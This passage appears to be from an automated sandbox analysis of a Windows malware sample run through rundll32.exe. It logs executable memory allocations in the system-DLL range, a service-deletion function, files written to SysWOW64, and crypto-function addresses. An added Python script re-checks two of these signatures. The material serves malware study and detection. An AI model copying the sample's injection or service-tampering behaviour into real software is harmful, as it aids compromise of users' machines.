Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
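The two behaviour signatures above, the "Very long command line found" entries at the top of this section and the RWX allocations at 76E20000/76D20000 under "Allocates memory within range which is reserved for system DLLs", can be re-applied offline to report lines written in this "Source: ..." format. The Python below is an added example and is not part of the Joe Sandbox report nor of the sample's own code; the system-DLL address band, the command-line length threshold and the sample lines are constructed assumptions for illustration (the two 0x76... addresses are the ones listed above, the others are made up).

```python
import re

# Constructed sample lines in the report's own "Source: ..." format
# (not the sandbox's real output; two addresses match the ones listed above).
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7605",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 00A40000 page execute and read and write",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page read and write",
    r"Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 120",
]

# Assumed address band where 32-bit (WOW64) system DLLs such as kernel32.dll
# and advapi32.dll are normally mapped; real load addresses depend on the
# Windows build and ASLR, so tune this to the analysis VM.
SYSTEM_DLL_RANGE = (0x74000000, 0x7FFE0000)
# Assumed threshold for "very long" command lines (not the sandbox's value).
LONG_CMDLINE_THRESHOLD = 4096

ALLOC_RE = re.compile(
    r"^Source: (?P<proc>\S+) Memory allocated: (?P<addr>[0-9A-Fa-f]{8}) page (?P<prot>.+)$"
)
CMD_RE = re.compile(
    r"^Source: (?P<proc>\S+) Process created: Commandline size = (?P<size>\d+)$"
)


def rwx_allocs_in_system_dll_range(lines):
    """Return (process, address) for allocations that are both writable and
    executable and that land inside the band reserved for system DLLs.
    Legitimate code rarely allocates RWX there; injected loaders do."""
    hits = []
    for line in lines:
        m = ALLOC_RE.match(line)
        if not m:
            continue
        addr = int(m.group("addr"), 16)
        prot = m.group("prot")
        rwx = "execute" in prot and "write" in prot
        if rwx and SYSTEM_DLL_RANGE[0] <= addr < SYSTEM_DLL_RANGE[1]:
            hits.append((m.group("proc"), addr))
    return hits


def long_command_lines(lines, threshold=LONG_CMDLINE_THRESHOLD):
    """Return (process, size) for process creations whose command line
    length is at or above the threshold (typical of encoded PowerShell)."""
    hits = []
    for line in lines:
        m = CMD_RE.match(line)
        if m and int(m.group("size")) >= threshold:
            hits.append((m.group("proc"), int(m.group("size"))))
    return hits


def alloc_counts(lines):
    """Collapse repeated identical RWX allocations into per-address counts,
    the way a report that lists each event separately can be summarised."""
    counts = {}
    for proc, addr in rwx_allocs_in_system_dll_range(lines):
        counts[(proc, addr)] = counts.get((proc, addr), 0) + 1
    return counts


if __name__ == "__main__":
    for proc, addr in rwx_allocs_in_system_dll_range(SAMPLE_LINES):
        print(f"RWX in system DLL range: {proc} -> {addr:08X}")
    for proc, size in long_command_lines(SAMPLE_LINES):
        print(f"Very long command line: {proc} ({size} chars)")
```

The allocation check deliberately ignores the non-executable 76E20000 line and the RWX allocation at 00A40000, which sits in ordinary process heap space: it is the combination of RWX protection and an address in the system-DLL band that the signature keys on, not either property alone.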
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AF3A1 DeleteService, 12_2_004AF3A1
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Yozs\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100135DE 7_2_100135DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019081 7_2_10019081
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C0D0 7_2_1000C0D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C228 7_2_1000C228
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BA3C 7_2_1000BA3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A30D 7_2_1001A30D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000CB34 7_2_1000CB34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019B65 7_2_10019B65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000EB85 7_2_1000EB85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D39E 7_2_1000D39E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E3E0 7_2_1000E3E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B4F3 7_2_1001B4F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100195F3 7_2_100195F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C71C 7_2_1000C71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000CF69 7_2_1000CF69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A6005 7_2_001A6005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B1079 7_2_001B1079
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AE871 7_2_001AE871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B0065 7_2_001B0065
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B1913 7_2_001B1913
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A510E 7_2_001A510E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B5136 7_2_001B5136
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A415F 7_2_001A415F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B41AD 7_2_001B41AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A2A18 7_2_001A2A18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A0A00 7_2_001A0A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B2A00 7_2_001B2A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B8279 7_2_001B8279
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001ACA68 7_2_001ACA68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A6A6F 7_2_001A6A6F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A628A 7_2_001A628A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001C12B6 7_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B02A0 7_2_001B02A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B6AD5 7_2_001B6AD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AD2C9 7_2_001AD2C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A8B16 7_2_001A8B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AFB05 7_2_001AFB05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A8355 7_2_001A8355
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B4B48 7_2_001B4B48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A1B46 7_2_001A1B46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B2B45 7_2_001B2B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AE380 7_2_001AE380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AF3B5 7_2_001AF3B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A33AB 7_2_001A33AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A5BAC 7_2_001A5BAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AABF8 7_2_001AABF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B9BE4 7_2_001B9BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A3C28 7_2_001A3C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A7C4A 7_2_001A7C4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AC44B 7_2_001AC44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B4460 7_2_001B4460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AE499 7_2_001AE499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B9494 7_2_001B9494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001BC48F 7_2_001BC48F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001ABCA5 7_2_001ABCA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B5CCB 7_2_001B5CCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AA4E1 7_2_001AA4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A6D2C 7_2_001A6D2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A3521 7_2_001A3521
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001ADD24 7_2_001ADD24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001BBD5E 7_2_001BBD5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B7D78 7_2_001B7D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001BB59B 7_2_001BB59B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001BA59F 7_2_001BA59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A7D94 7_2_001A7D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A4DB8 7_2_001A4DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A75A0 7_2_001A75A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B2DE1 7_2_001B2DE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001C1600 7_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B6E50 7_2_001B6E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A367A 7_2_001A367A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B1E7D 7_2_001B1E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A5EBA 7_2_001A5EBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A06B6 7_2_001A06B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B66AE 7_2_001B66AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B06D1 7_2_001B06D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AC6CE 7_2_001AC6CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B96EA 7_2_001B96EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B8EE2 7_2_001B8EE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A6EE4 7_2_001A6EE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B7713 7_2_001B7713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AEF04 7_2_001AEF04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B473C 7_2_001B473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AAF28 7_2_001AAF28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001ACF5B 7_2_001ACF5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A5742 7_2_001A5742
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AD760 7_2_001AD760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001B4F60 7_2_001B4F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A2F97 7_2_001A2F97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001BBFB0 7_2_001BBFB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AA7A2 7_2_001AA7A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001AB7C2 7_2_001AB7C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A77F0 7_2_001A77F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001A27F4 7_2_001A27F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C6C05 9_2_001C6C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C6E8A 9_2_001C6E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C9716 9_2_001C9716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CFB04 9_2_001CFB04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D533C 9_2_001D533C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C4121 9_2_001C4121
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D5748 9_2_001D5748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CE360 9_2_001CE360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DC19B 9_2_001DC19B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D4DAD 9_2_001D4DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C83F0 9_2_001C83F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DA7E4 9_2_001DA7E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C3618 9_2_001C3618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C1600 9_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D3600 9_2_001D3600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C4828 9_2_001C4828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D7A50 9_2_001D7A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C884A 9_2_001C884A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CD04B 9_2_001CD04B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D2A7D 9_2_001D2A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D1C79 9_2_001D1C79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D8E79 9_2_001D8E79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C427A 9_2_001C427A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CF471 9_2_001CF471
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C766F 9_2_001C766F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CD668 9_2_001CD668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D0C65 9_2_001D0C65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D5060 9_2_001D5060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CF099 9_2_001CF099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DA094 9_2_001DA094
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DD08F 9_2_001DD08F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C6ABA 9_2_001C6ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C12B6 9_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D72AE 9_2_001D72AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CC8A5 9_2_001CC8A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D0EA0 9_2_001D0EA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D76D5 9_2_001D76D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D12D1 9_2_001D12D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CD2CE 9_2_001CD2CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CDEC9 9_2_001CDEC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D68CB 9_2_001D68CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DA2EA 9_2_001DA2EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C7AE4 9_2_001C7AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CB0E1 9_2_001CB0E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D9AE2 9_2_001D9AE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D8313 9_2_001D8313
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D2513 9_2_001D2513
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C5D0E 9_2_001C5D0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D0705 9_2_001D0705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D5D36 9_2_001D5D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C792C 9_2_001C792C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CBB28 9_2_001CBB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CE924 9_2_001CE924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DC95E 9_2_001DC95E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C4D5F 9_2_001C4D5F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CDB5B 9_2_001CDB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C8F55 9_2_001C8F55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D3745 9_2_001D3745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C2746 9_2_001C2746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C6342 9_2_001C6342
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D8978 9_2_001D8978
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D5B60 9_2_001D5B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DB19F 9_2_001DB19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C8994 9_2_001C8994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C3B97 9_2_001C3B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CEF80 9_2_001CEF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C59B8 9_2_001C59B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CFFB5 9_2_001CFFB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001DCBB0 9_2_001DCBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C67AC 9_2_001C67AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C3FAB 9_2_001C3FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C81A0 9_2_001C81A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CB3A2 9_2_001CB3A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CC3C2 9_2_001CC3C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001CB7F8 9_2_001CB7F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001C33F4 9_2_001C33F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001D39E1 9_2_001D39E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E6005 10_2_001E6005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E3C28 10_2_001E3C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E7C4A 10_2_001E7C4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EC44B 10_2_001EC44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F1079 10_2_001F1079
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EE871 10_2_001EE871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F0065 10_2_001F0065
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F4460 10_2_001F4460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EE499 10_2_001EE499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F9494 10_2_001F9494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FC48F 10_2_001FC48F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EBCA5 10_2_001EBCA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F5CCB 10_2_001F5CCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EA4E1 10_2_001EA4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F1913 10_2_001F1913
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E510E 10_2_001E510E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F5136 10_2_001F5136
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E6D2C 10_2_001E6D2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EDD24 10_2_001EDD24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E3521 10_2_001E3521
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FBD5E 10_2_001FBD5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E415F 10_2_001E415F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F7D78 10_2_001F7D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FA59F 10_2_001FA59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FB59B 10_2_001FB59B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E7D94 10_2_001E7D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E4DB8 10_2_001E4DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F41AD 10_2_001F41AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E75A0 10_2_001E75A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F2DE1 10_2_001F2DE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E2A18 10_2_001E2A18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E0A00 10_2_001E0A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F2A00 10_2_001F2A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00201600 10_2_00201600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F6E50 10_2_001F6E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F1E7D 10_2_001F1E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E367A 10_2_001E367A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F8279 10_2_001F8279
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E6A6F 10_2_001E6A6F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001ECA68 10_2_001ECA68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E628A 10_2_001E628A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002012B6 10_2_002012B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E5EBA 10_2_001E5EBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E06B6 10_2_001E06B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F66AE 10_2_001F66AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F02A0 10_2_001F02A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F6AD5 10_2_001F6AD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F06D1 10_2_001F06D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EC6CE 10_2_001EC6CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001ED2C9 10_2_001ED2C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F96EA 10_2_001F96EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E6EE4 10_2_001E6EE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F8EE2 10_2_001F8EE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E8B16 10_2_001E8B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F7713 10_2_001F7713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EEF04 10_2_001EEF04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EFB05 10_2_001EFB05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F473C 10_2_001F473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EAF28 10_2_001EAF28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001ECF5B 10_2_001ECF5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E8355 10_2_001E8355
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F4B48 10_2_001F4B48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E1B46 10_2_001E1B46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F2B45 10_2_001F2B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E5742 10_2_001E5742
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001ED760 10_2_001ED760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F4F60 10_2_001F4F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E2F97 10_2_001E2F97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EE380 10_2_001EE380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EF3B5 10_2_001EF3B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001FBFB0 10_2_001FBFB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E5BAC 10_2_001E5BAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E33AB 10_2_001E33AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EA7A2 10_2_001EA7A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EB7C2 10_2_001EB7C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001EABF8 10_2_001EABF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E27F4 10_2_001E27F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E77F0 10_2_001E77F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001F9BE4 10_2_001F9BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F3C28 11_2_002F3C28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F6005 11_2_002F6005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00301079 11_2_00301079
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00304460 11_2_00304460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00300065 11_2_00300065
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FE871 11_2_002FE871
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FC44B 11_2_002FC44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F7C4A 11_2_002F7C4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FBCA5 11_2_002FBCA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00309494 11_2_00309494
